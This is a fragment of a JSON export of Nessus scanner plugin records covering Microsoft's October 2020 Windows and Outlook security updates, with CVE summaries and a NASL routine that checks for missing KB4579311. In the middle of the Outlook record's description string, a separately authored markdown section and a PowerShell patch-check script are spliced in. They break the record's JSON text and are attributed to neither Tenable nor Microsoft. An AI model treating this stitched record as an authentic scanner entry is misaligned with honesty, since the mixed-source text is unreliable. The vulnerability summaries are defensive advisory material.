(CVE-2020-16887)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2020-16927)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-16912, CVE-2020-16936,\n CVE-2020-16972, CVE-2020-16973, CVE-2020-16974,\n CVE-2020-16975, CVE-2020-16976)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-16907, CVE-2020-16913)\n\n - An information disclosure vulnerability exists when the\n .NET Framework improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could disclose contents of an affected system's memory.\n (CVE-2020-16937)\n\n - An information disclosure vulnerability exists when the\n Windows KernelStream improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the user's system. (CVE-2020-16889)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2020-16916, CVE-2020-16935)\n\n - An elevation of privilege vulnerability exists when the\n Windows Event System improperly handles objects in\n memory. 
(CVE-2020-16900)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n handle objects in memory. An attacker who successfully\n exploited these vulnerabilities could gain elevated\n privileges on a target operating system. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, this vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerabilities by correcting how Windows Hyper-V\n handles objects in memory. (CVE-2020-1047,\n CVE-2020-1080)\n\n - An information disclosure vulnerability exists when the\n Windows Enterprise App Management Service improperly\n handles certain file operations. An attacker who\n successfully exploited this vulnerability could read\n arbitrary files. An attacker with unprivileged access to\n a vulnerable system could exploit this vulnerability.\n The security update addresses the vulnerability by\n ensuring the Windows Enterprise App Management Service\n properly handles file operations. 
(CVE-2020-16919)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4579311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4579311.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-16968\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-16915\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-10\";\nkbs = make_list('4579311');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"19041\",\n rollup_date:\"10_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4579311])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T00:53:21", "description": "The Microsoft Outlook application installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. 
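The Nessus plugin above decides "missing" by calling smb_check_rollup for Windows 10 build 19041 against rollup KB4579311 over SMB. An administrator who wants the same answer locally, without a scanner, can ask the host directly. The following PowerShell is an added example written for this page; it is not Tenable's plugin code or Microsoft's text. It assumes, from Microsoft's release notes for KB4579311, that the update raises the 19041 build revision (UBR) to 572; that value and the script itself are this example's own, not the plugin's.

```powershell
# Added example (not part of the Nessus plugin or Microsoft's advisory text).
# Mirrors the plugin's check: is a Windows 10 version 2004 (build 19041) host
# missing the October 2020 cumulative update KB4579311?
# Assumption: KB4579311 brings the build to 19041.572 (Microsoft release notes).

$kb        = 'KB4579311'
$targetUbr = 572   # revision of build 19041 after KB4579311 (assumed, see above)

$cv    = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
$build = [int]$cv.CurrentBuildNumber
$ubr   = [int]$cv.UBR

# The plugin only fires on build 19041; other builds get their own rollup KB.
if ($build -ne 19041) {
    Write-Output "Build $build is not Windows 10 2004 (19041); this check does not apply."
    return
}

# Two independent signals, as a scanner would want:
#  1. the hotfix inventory (CBS store) lists the KB by ID;
#  2. the kernel's own revision number is at or above the patched level.
# Signal 2 matters because a later cumulative update supersedes KB4579311 and
# Get-HotFix will then no longer list that ID even though the fix is present.
$hotfixPresent = [bool](Get-HotFix -Id $kb -ErrorAction SilentlyContinue)

if ($hotfixPresent -or $ubr -ge $targetUbr) {
    Write-Output "Patched: OS build $build.$ubr (hotfix $kb listed: $hotfixPresent)"
} else {
    Write-Output "MISSING $kb: OS build $build.$ubr is below 19041.$targetUbr"
}
```

Run it in an elevated PowerShell on the host being checked. Relying on the UBR rather than the KB ID alone is the same reason the plugin reads the rollup date rather than a single hotfix entry: cumulative updates replace each other, so the absence of one KB name does not by itself mean the fix is absent.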
If the current user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-16947)\n\n - A denial of service vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could cause a remote denial of service against a system. Exploitation of the vulnerability requires that a specially crafted email be sent to a vulnerable Outlook server. The security update addresses the vulnerability by correcting how Microsoft Outlook handles objects in memory. (CVE-2020-16949)", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-10-13T00:00:00", "type": "nessus", "title": "Security Updates for Outlook (October 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-16947", "CVE-2020-16949"], "modified": "2020-12-11T00:00:00", "cpe": ["cpe:/a:microsoft:outlook"], "id": "SMB_NT_MS20_OCT_OUTLOOK.NASL", "href": "https://www.tenable.com/plugins/nessus/141428", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_